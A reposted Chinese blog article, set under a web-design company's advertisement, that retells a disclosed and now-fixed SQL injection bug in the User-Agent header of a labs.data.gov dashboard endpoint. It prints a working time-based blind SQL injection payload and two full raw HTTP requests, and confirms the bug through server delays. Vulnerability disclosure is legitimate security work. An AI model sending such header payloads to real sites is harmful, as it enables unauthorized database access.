如何分析HTTP頭注入中的User-Agent注入

如何分析 HTTP頭注入中的User-Agent注入，很多新手對此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來學(xué)習(xí)下，希望你能有所收獲。

成都創(chuàng)新互聯(lián)公司從2013年成立，是專業(yè)互聯(lián)網(wǎng)技術(shù)服務(wù)公司，擁有項(xiàng)目成都網(wǎng)站制作、網(wǎng)站建設(shè)、外貿(mào)網(wǎng)站建設(shè)網(wǎng)站策劃，項(xiàng)目實(shí)施與項(xiàng)目整合能力。我們以讓每一個(gè)夢想脫穎而出為使命，1280元若羌做網(wǎng)站,已為上家服務(wù),為若羌各地企業(yè)和個(gè)人服務(wù),聯(lián)系電話:18982081108

漏洞信息

發(fā)現(xiàn)者：harisec

漏洞種類：SQL注入

危害等級(jí)：嚴(yán)重

漏洞狀態(tài)：已修復(fù)

前言

Harisec在以下網(wǎng)站中發(fā)現(xiàn)一個(gè)SQL注入漏洞，注入的位置在User-Agent。

https://labs.data.gov/dashboard/datagov/csv_to_json

漏洞再現(xiàn)

Harisec使用了盲注的方式來確認(rèn)該漏洞

例如：將User-Agent的值設(shè)置為

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

將導(dǎo)致服務(wù)器在25秒后響應(yīng)

這里，我們看一下具體的數(shù)據(jù)包內(nèi)容

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

如何分析 HTTP頭注入中的User-Agent注入

服務(wù)器在25秒后響應(yīng)，與User-Agent的值相同

將User-Agent的值改一下，改成9秒后響應(yīng)

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

如何分析 HTTP頭注入中的User-Agent注入

漏洞影響

該漏洞可以使攻擊者注入惡意的SQL語句。

看完上述內(nèi)容是否對您有幫助呢？如果還想對相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝您對創(chuàng)新互聯(lián)的支持。

文章名稱：如何分析HTTP頭注入中的User-Agent注入
轉(zhuǎn)載來于：http://m.jiaotiyi.com/article/jppsjg.html

網(wǎng)站建設(shè)知識(shí)

如何分析HTTP頭注入中的User-Agent注入

其他資訊